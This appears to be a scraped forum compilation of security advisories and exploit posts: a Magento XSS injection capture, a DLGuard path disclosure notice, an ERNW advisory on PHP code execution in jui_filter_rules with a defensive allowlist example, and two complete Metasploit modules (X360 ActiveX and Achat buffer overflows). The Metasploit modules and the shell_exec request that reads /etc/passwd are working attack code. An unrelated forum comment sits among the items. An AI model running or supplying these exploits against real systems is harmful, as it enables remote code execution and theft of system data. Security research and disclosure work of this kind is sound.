Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; has_js=1; ClrSSID=1394911380598-4406; ClrOSSID=1394911380598-4406; ClrSCD=1394911380598; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fcustomers%2Fcustomer-showcase; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentomagento%2Cmagentoglobal%3D%2526pid%253D%25252Fcustomers%25252Fcustomer-showcase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmagento.com%25252Fexplore%25252Fcontact-sales_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=-%2C84%2C84%2C2200; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com]
Connection[keep-alive]
If-None-Match["1394841413-1"]
Response Header:
Server[maged]
Date[Sat, 15 Mar 2014 20:15:18 GMT]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Drupal-Cache[HIT]
Etag["1394841413-1"]
x-content-type-options[nosniff]
X-Frame-Options[SameOrigin]
Content-Language[en]
Link[<http://magento.com/explore/contact-sales>; rel="canonical",<http://magento.com/node/22>; rel="shortlink"]
Cache-Control[public, max-age=86400]
Last-Modified[Fri, 14 Mar 2014 23:56:53 +0000]
Expires[Sun, 19 Nov 1978 05:00:00 GMT]
Vary[Cookie, Accept-Encoding]
Content-Encoding[gzip]
X-Server[web04]
-
21:15:34.123[335ms][total 335ms] Status: 302[Found]
POST https://info.magento.com/index.php/leadCapture/save
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[135] Mime Type[text/html]
Request Header:
Host[info.magento.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://info.magento.com/EC-Kraus.html]
Cookie[optimizelySegments=%7B%22239237138%22%3A%22direct%22%2C%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%7D; optimizelyEndUserId=oeu1394911379094r0.20693940633527685; optimizelyBuckets=%7B%7D; _ga=GA1.2.394130418.1394911379; BIGipServerabjweb-ssl2_http=3892838666.20480.0000; s_cc=true; s_fid=5EF56BF224B1A40C-0256902EC3CD13C6; gpv_pn=%2Fec-kraus.html; undefined_s=First%20Visit; s_vnum=1396303200710%26vn%3D1; s_invisit=true; s_sq=magentoinfo%2Cmagentoglobal%3D%2526pid%253D%25252Fec-kraus.html%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BformSubmit%252528document.getElementById%252528%252522mktForm_1129%252522%252529%252529%25253Breturnfalse%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT; s_ppv=-%2C100%2C100%2C832; utm_src=a%3A6%3A%7Bs%3A8%3A%22campaign%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22medium%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22source%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A7%3A%22keyword%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22url%22%3Bs%3A11%3A%22magento.com%22%3Bs%3A4%3A%22time%22%3Bi%3A1394911525%3B%7D; BIGipServerabjweb-ssl2_https=3909615882.47873.0000; ClrSSID=1394911532386-9188; ClrOSSID=1394911532386-9188; ClrSCD=1394911532386; _mkto_trk=id:397-EXO-877&token:_mch-magento.com-1394911532816-55587; _tsm=m%3DDirect%2520%252F%2520Brand%2520Aware%253A%2520Typed%2520%252F%2520Bookmarked%2520%252F%2520etc%7Cs%3Dmagento.com%7Crp%3D%252Fwww.magentocommerce.com%252Fdownload%7Crd%3Dmagento.com; optimizelyPendingLogEvents=%5B%5D; ClrCSTO=T]
Connection[keep-alive]
POST-Daten:
FirstName[%3Ciframe+src%3Da%3E]
LastName[%3Ciframe+src%3Da%3E]
Email[bkm%40evolution-sec.com]
_marketo_comments[]
lpId[2314]
subId[36]
munchkinId[397-EXO-877]
kw[not+found]
cr[not+found]
searchstr[not+found]
lpurl[https%3A%2F%2Finfo.magento.com%2FEC-Kraus.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D]
formid[1129]
returnURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
retURL[https%3A%2F%2Finfo.magento.com%2FEC-Kraus-confirm.html]
returnLPId[2301]
_mkt_disp[return]
_mkt_trk[id%3A397-EXO-877%26token%3A_mch-magento.com-1394911532816-55587]
_comments_marketo[]
_mkto_version[2.4.7]
Response Header:
Date[Sat, 15 Mar 2014 20:15:34 GMT]
Server[Apache]
Location[https://info.magento.com/EC-Kraus-confirm.html?aliId=67114725]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[135]
Connection[close]
Content-Type[text/html]

Reference(s):
http://magento.com/customers/customer-showcase
http://magento.com/explore/contact-sales
https://info.magento.com/EC-Kraus-confirm.html?aliId=67114607
https://info.magento.com/EC-Kraus.html
https://info.magento.com/index.php/leadCapture/save

Resource(s):
../Contact Sales _ Magento-inputstep1.htm
../Contact Sales _ Magento-inputstep2.htm
../EC-Kraus-confirm.html
../EC-Kraus-poc2.html
../Your E.C. Kraus Magento Enterprise Case Study Download.html
../Your E.C. Kraus Magento Enterprise Case Study Download.eml
../poc-session-logs.txt
../poc-url-references.txt

Picture(s): (view magazine article)
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png
../7.png

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse or encode of the `talk to a specialist` input context. Encode and parse also the outgoing user values of the talk to a specialist form to prevent persistent injections via POST to outgoing service ebay magento mails. Restrict the input and disallow the usage of special chars.

Security Risk:
==============
The security risk of the persistent input validation and mail encoding web vulnerability is estimated as medium. (CVSS 3.8)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. 
To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  12. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "X360 VideoPlayer ActiveX Control Buffer Overflow",
      'Description'    => %q{
        This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with
        the X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can
        overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Rh0',          # vulnerability discovery and exploit, all the hard work
          'juan vazquez'  # msf module
        ],
      'References'     =>
        [
          ['EDB', '35948'],
          ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/']
        ],
      'Payload'        =>
        {
          'Space'          => 1024,
          'DisableNops'    => true,
          'PrependEncoder' => stack_adjust
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :clsid   => "{4B3476C6-185A-4D19-BB09-718B565FA67B}",
          :os_name => OperatingSystems::Match::WINDOWS,
          :ua_name => Msf::HttpClients::IE,
          :ua_ver  => '10.0'
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 30 2015",
      'DefaultTarget'  => 0))
  end

  # Prepended to the payload: move ESP down to the thread's stack limit so the
  # decoder/payload runs on a stack that cannot be clobbered by the overflow.
  def stack_adjust
    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18]   # get teb
    adjust << "\x83\xC0\x08"             # add eax, byte 8      # get pointer to stacklimit
    adjust << "\x8b\x20"                 # mov esp, [eax]       # put esp at stacklimit
    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000       # plus a little offset
    adjust
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    case request.uri
    when /exploit.js/
      print_status("Sending exploit.js...")
      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
      send_exploit_html(cli, exploit_template(cli, target_info), headers)
    when /sprayer.js/
      print_status("Sending sprayer.js...")
      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
      send_exploit_html(cli, sprayer_template(cli, target_info), headers)
    when /informer.js/
      print_status("Sending informer.js...")
      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
      send_exploit_html(cli, informer_template(cli, target_info), headers)
    when /rop_builder.js/
      print_status("Sending rop_builder.js...")
      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'}
      send_exploit_html(cli, rop_builder_template(cli, target_info), headers)
    else
      print_status("Sending main.html...")
      headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'}
      send_exploit_html(cli, main_template(cli, target_info), headers)
    end
  end

  def main_template(cli, target_info)
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html')
    template = ''
    File.open(path, 'rb') { |f| template = strip_comments(f.read) }

    return template, binding()
  end

  def exploit_template(cli, target_info)
    shellcode = Rex::Text.to_hex(get_payload(cli, target_info))
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
    template = ''
    File.open(path, 'rb') { |f| template = strip_comments(f.read) }

    return template, binding()
  end

  def sprayer_template(cli, target_info)
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
    template = ''
    File.open(path, 'rb') { |f| template = strip_comments(f.read) }

    return template, binding()
  end

  def informer_template(cli, target_info)
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
    template = ''
    File.open(path, 'rb') { |f| template = strip_comments(f.read) }

    return template, binding()
  end

  def rop_builder_template(cli, target_info)
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
    template = ''
    File.open(path, 'rb') { |f| template = strip_comments(f.read) }

    return template, binding()
  end

  # Drop // line comments from the JS templates before serving them.
  def strip_comments(input)
    input.gsub(/\/\/.*$/, '')
  end
end

Source
  13. *DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities*

Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
DLGuard

*Product & Version:*
DLGuard v4.5

*Vendor URL & Download:*
DLGuard can be downloaded from here, http://www.dlguard.com/dlginfo/index.php

*Product Introduction:*
"DLGuard is a powerful, yet easy to use script that you simply upload to your website and then rest assured that your internet business is not only safe, but also much easier to manage, automating the tasks you just don't have the time for."

"DLGuard supports the three types, or methods, of sale on the internet:
<1> Single item sales (including bonus products!)
<2> Multiple item sales
<3> Membership websites"

*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by Full Path Disclosure attacks.

*(2.1)* The first vulnerability occurs at the "index.php" page with the "c" parameter.

*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

Source
  14. -----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

PHP Code Execution in jui_filter_rules Parsing Library
======================================================

Researcher: Timo Schmid <tschmid@ernw.de>

Description
===========
jui_filter_rules[1] is a jQuery plugin which allows users to generate a ruleset which could be used to filter datasets inside a web application. The plugin also provides a PHP library to turn the user submitted ruleset into SQL where statements for server side filtering.

This PHP library contains a feature which allows to convert the submitted filter values with server side functions. These functions can be specified within the ruleset, which leads to an arbitrary PHP code execution.

Exploitation Technique
======================
Remote

Severity Level
==============
Critical

CVSS Base Score
===============
6.8 (AV:N / AC:M / Au:N / C:P / I:P / A:P)

CVE-ID
======
<unassigned>

Impact
======
By using the provided rule parsing library to generate SQL statements, an attacker is capable of executing arbitrary PHP code in the context of the web server. This could lead to a full compromise of the web server.

The attack vector could be limited by existing validation mechanisms around the library, but this would require a partial manual parsing of the user supplied rules.

Status
======
Reported

Vulnerable Code Section
=======================
server_side/php/jui_filter_rules.php:

[...]
    private function create_filter_value_sql($filter_type, $operator_type, ...
[...]
            if(is_array($filter_value_conversion_server_side)) {
                $function_name = $filter_value_conversion_server_side['function_name'];
                $args = $filter_value_conversion_server_side['args'];
                $arg_len = count($args);

                for($i = 0; $i < $vlen; $i++) {
                    // create arguments values for this filter value
                    $conversion_args = array();
                    for($a = 0; $a < $arg_len; $a++) {
                        if(array_key_exists('filter_value', $args[$a])) {
                            array_push($conversion_args, $a_values[$i]);
                        }
                        if(array_key_exists('value', $args[$a])) {
                            array_push($conversion_args, $args[$a]['value']);
                        }
                    }

                    // execute user function and assign return value to filter value
                    try {
                        $a_values[$i] = call_user_func_array($function_name, $conversion_args);
                    } catch(Exception $e) {
                        $this->last_error = array(
                            'element_rule_id' => $element_rule_id,
                            'error_message' => $e->getMessage()
                        );
                        break;
                    }
                }
            }
[...]

The provided PHP parsing library allows specifying a PHP function to convert the supplied filter value on the server side. This ultimately leads to code execution through attacker supplied input. As no whitelist approach is used, any existing PHP function could be executed (including shell commands).

Proof of Concept
================
Using the demo application from the git repository:

Executing shell_exec('cat /etc/passwd')

Request:

POST /ajax_create_sql.dist.php HTTP/1.0
host: http://www.example.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 471

a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=shell_exec&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=&a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpasswd&pst_placeholder=question_mark&a_rules%5B0%5D%5Belement_rule_id%5D=foo&use_ps=yes&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field&a_rules%5B0%5D%5Bcondition%5D%5Boperator%5D=equal&a_rules%5B0%5D%5Bcondition%5D%5BfilterType%5D=date

Response:

HTTP/1.1 200 OK
Date: Tue, 13 Jan 2015 02:12:33 GMT
Server: Apache/2.2.22 (Debian)
Content-Length: 530
Content-Type: text/html

{"sql":"WHERE \nsome_field = ?","bind_params":"root:x:0:0:admin COSMOS:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh"}

Solution
========
This functionality should generally be removed or replaced by a mapping/whitelist approach and strict type filtering to prevent arbitrary code execution.

Affected Versions
=================
>= git commit b1e795eeba1bac2f9b0d383cd3da24d6d26ccb4b
< 1.0.6 (commit 0b61463cd02cc1814046b516242779b29ba7d1e1)

Timeline
========
2015-01-12: Vulnerability found
2015-01-13: Developer informed
2015-02-14: Fixed in version 1.0.6 (git 0b61463cd02cc1814046b516242779b29ba7d1e1)

References
==========
[1] http://www.pontikis.net/labs/jui_filter_rules
[2] https://www.owasp.org/index.php/Code_Injection
[3] https://www.ernw.de/download/BC-1501.txt
[4] https://bufferoverflow.eu/BC-1501.txt

Advisory-ID
===========
BC-1501

Disclaimer
==========
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

- --
Timo Schmid

ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg - www.ernw.de
Tel. +49 6221 48039-0 (HQ) - Fax +49 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================

================== TROOPERS15 ==================
* International IT Security Conference & Workshops
* 16th - 20th March 2015 / Heidelberg, Germany
* www.troopers.de
====================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBAwAGBQJU5KMNAAoJEHq2kn1vJmzgroMIAIsvJOdkZLSIjp1bdczg7NFP
YBcVZNXXd7H2LES/bH20wGHMEke2YfL97CfjBk5R1OpBaialTHHi/HrzqbnWft2x
x+u7rOdG0Q+aAAakoBpO7wG1B97+bmXnR6ytgFtxgJO+dfWWwAxhjsqjQ0boRgMr
bzhFkHznlUV2s89n6vEBG2qnowSNqJgnWpbkyekCyISF87bh4nfuNDoj40+aCCNa
Iw3AO8S2bvgVqY980hovoCsW94764/65mVMr2dvTlQx3tR1zTra2km8yq0IOtdIs
AJ8dicIAN0EDuGQKFtLbxkShh4E9spXeQlFRmz1kLa76PELHzJWnyhKUB4o+uds=
=tnwW
-----END PGP SIGNATURE-----

Source
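The advisory's proposed fix is a mapping/whitelist instead of calling whatever function name the client sends. The following is an added example, written in Ruby rather than the library's PHP, and not code from jui_filter_rules or from ERNW: it parses the a_rules[...] body shape shown in the PoC request, resolves function_name against a fixed table of conversions, passes the filter value as the only argument, and rejects anything else before it could reach the SQL builder. CONVERSIONS, RuleRejected, parse_rules and convert_all are names chosen for this example; the sample bodies are constructed from the PoC's parameters.

```ruby
require 'cgi'
require 'date'

# Allowlist of server-side conversions a client ruleset may name. The rule
# supplies only the key; the code behind it is fixed here, so nothing the
# client sends is ever used as a function name.
CONVERSIONS = {
  'trim'     => ->(v) { v.strip },
  'to_upper' => ->(v) { v.upcase },
  'to_lower' => ->(v) { v.downcase },
  # strict type filtering: anything that is not an ISO date is an error
  'to_date'  => ->(v) { Date.strptime(v, '%Y-%m-%d').iso8601 }
}.freeze

class RuleRejected < StandardError; end

# Parse the url-encoded a_rules[i][...] body (the shape used in the PoC
# request) into one hash per rule: { function_name:, filter_value: }.
# Client-supplied literal "args" are deliberately not collected: the only
# argument a conversion ever receives is the filter value itself.
def parse_rules(body)
  rules = Hash.new { |h, k| h[k] = {} }
  CGI.parse(body).each do |key, values|
    next unless (m = key.match(/\Aa_rules\[(\d+)\]\[(.+)\]\z/))
    idx, path = m[1].to_i, m[2].split('][')
    case path
    when %w[filter_value_conversion_server_side function_name]
      rules[idx][:function_name] = values.first
    when %w[condition filterValue]
      rules[idx][:filter_value] = values.first
    end
  end
  rules.sort.map { |_, rule| rule }
end

# Hardened conversion: look the name up instead of calling it. Unknown
# names, non-string values and conversion failures are all rejected.
def convert_filter_value(rule)
  name, value = rule[:function_name], rule[:filter_value]
  return value if name.nil? # no conversion requested
  fn = CONVERSIONS.fetch(name) { raise RuleRejected, "conversion not allowed: #{name.inspect}" }
  raise RuleRejected, 'filter value must be a string' unless value.is_a?(String)
  fn.call(value)
rescue ArgumentError => e # Date::Error is an ArgumentError
  raise RuleRejected, "bad filter value for #{name}: #{e.message}"
end

# Convert every rule in a request body; raises RuleRejected on the first bad rule.
def convert_all(body)
  parse_rules(body).map { |rule| convert_filter_value(rule) }
end

# Constructed sample bodies. POC_BODY carries the function_name/args/filterValue
# parameters of the advisory's PoC request; SAFE_BODY names allowed conversions.
POC_BODY = 'a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=shell_exec' \
           '&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=' \
           '&a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bargs%5D%5B0%5D%5Bvalue%5D=cat+%2Fetc%2Fpasswd' \
           '&a_rules%5B0%5D%5Bcondition%5D%5Bfield%5D=some_field'
SAFE_BODY = 'a_rules%5B0%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=to_upper' \
            '&a_rules%5B0%5D%5Bcondition%5D%5BfilterValue%5D=foo' \
            '&a_rules%5B1%5D%5Bfilter_value_conversion_server_side%5D%5Bfunction_name%5D=to_date' \
            '&a_rules%5B1%5D%5Bcondition%5D%5BfilterValue%5D=2015-01-13'

if $PROGRAM_NAME == __FILE__
  p convert_all(SAFE_BODY)        # ["FOO", "2015-01-13"]
  begin
    convert_all(POC_BODY)
  rescue RuleRejected => e
    puts "rejected: #{e.message}" # rejected: conversion not allowed: "shell_exec"
  end
end
```

The key design point is that the table maps a client-chosen string to code the server author wrote; the client never names a callable. Dropping the client-supplied args array is part of the fix, since even an allowlisted function becomes dangerous when the attacker controls all of its arguments.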
  15. Congrats @Kronzy, after 30 minutes of searching (lucky I had your "tips", otherwise I wouldn't have managed).
  16. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
      'Description'    => %q{
        This module exploits a unicode SEH based stack buffer overflow in Achat v0.150. By
        sending a crafted message to the default port 9256 it's possible to overwrite the SEH
        handler. Even though the exploit is reliable, it depends on timing, since there are two
        threads overflowing the stack at the same time. This module has been tested on Windows
        XP SP3 and Windows 7.
      },
      'Author'         =>
        [
          'Peter Kasza <peter.kasza[at]itinsight.hu>',  # Vulnerability discovery
          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>'   # Exploit, Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CWE', '121'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'DisableNops'     => true,
          'Space'           => 730,
          'BadChars'        => "\x00" + (0x80..0xff).to_a.pack("C*"),
          'StackAdjustment' => -3500,
          'EncoderType'     => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions'  =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested OK Windows XP SP3, Windows 7
          # Not working on Windows Server 2003
          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] # ppr from AChat.exe
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2014'))

    register_options(
      [
        Opt::RPORT(9256)
      ], self.class)
  end

  def exploit
    connect_udp

    # Unicode-expanded first stage (every byte below is followed by 0x00 on the target):
    # 0055 00      ADD BYTE PTR SS:[EBP],DL   # padding
    # 2A00         SUB AL,BYTE PTR DS:[EAX]   # padding
    # 55           PUSH EBP                   # ebp holds a close pointer to the payload
    # 006E 00      ADD BYTE PTR DS:[ESI],CH   # padding
    # 58           POP EAX                    # mov eax, ebp
    # 006E 00      ADD BYTE PTR DS:[ESI],CH   # padding
    # 05 00140011  ADD EAX,11001400           # adjusting eax
    # 006E 00      ADD BYTE PTR DS:[ESI],CH   # padding
    # 2D 00130011  SUB EAX,11001300           # lea eax, eax+100
    # 006E 00      ADD BYTE PTR DS:[ESI],CH   # padding
    # 50           PUSH EAX                   # eax points to the start of the shellcode
    # 006E 00      ADD BYTE PTR DS:[ESI],CH   # padding
    # 58           POP EAX                    # padding
    # 0043 00      ADD BYTE PTR DS:[EBX],AL   # padding
    # 59           POP ECX                    # padding
    # 0039         ADD BYTE PTR DS:[ECX],BH   # padding
    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"

    sploit =  'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
    sploit << "\x62" + 'A' * 45  # 0x62 will be used to calculate the right offset
    sploit << "\x61\x40"         # POPAD + INC EAX
    sploit << target.ret         # AChat.exe p/p/r address

    # adjusting the first thread's unicode payload, tricky asm-fu
    # the first seh exception jumps here, first_stage variable will be executed
    # by the second seh exception as well. It needs to be in sync with the second
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
    # payload, then first_stage variable will take the rest of the job.
    # 0043 00      ADD BYTE PTR DS:[EBX],AL   # padding
    # 55           PUSH EBP                   # ebp with close pointer to payload
    # 006E 00      ADD BYTE PTR DS:[ESI],CH   # padding
    # 58           POP EAX                    # put ebp to eax
    # 006E 00      ADD BYTE PTR DS:[ESI],CH   # padding
    # 2A00         SUB AL,BYTE PTR DS:[EAX]   # setting eax to the right place
    # 2A00         SUB AL,BYTE PTR DS:[EAX]   # adjusting eax a little bit more
    # 05 00140011  ADD EAX,11001400           # more adjusting
    # 0043 00      ADD BYTE PTR DS:[EBX],AL   # padding
    # 2D 00130011  SUB EAX,11001300           # lea eax, eax+100
    # 0043 00      ADD BYTE PTR DS:[EBX],AL   # padding
    # 50           PUSH EAX                   # saving eax
    # 0043 00      ADD BYTE PTR DS:[EBX],AL   # padding
    # 5D           POP EBP                    # mov ebp, eax
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret  # second nseh entry, for the second thread
    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 - 3)  # put address of the payload to EAX
    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length)           # placing the payload
    sploit << "\x00" + 'A' * 10 + "\x00"

    # Send in 8192-byte UDP chunks; slow down near the end so the two server
    # threads stay in sync with the overflow.
    i = 0
    while i < sploit.length do
      if i > 172000
        Rex::sleep(1.0)
      end
      sent = udp_sock.put(sploit[i..i + 8192 - 1])
      i += sent
    end

    disconnect_udp
  end
end

Source
  17. Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page

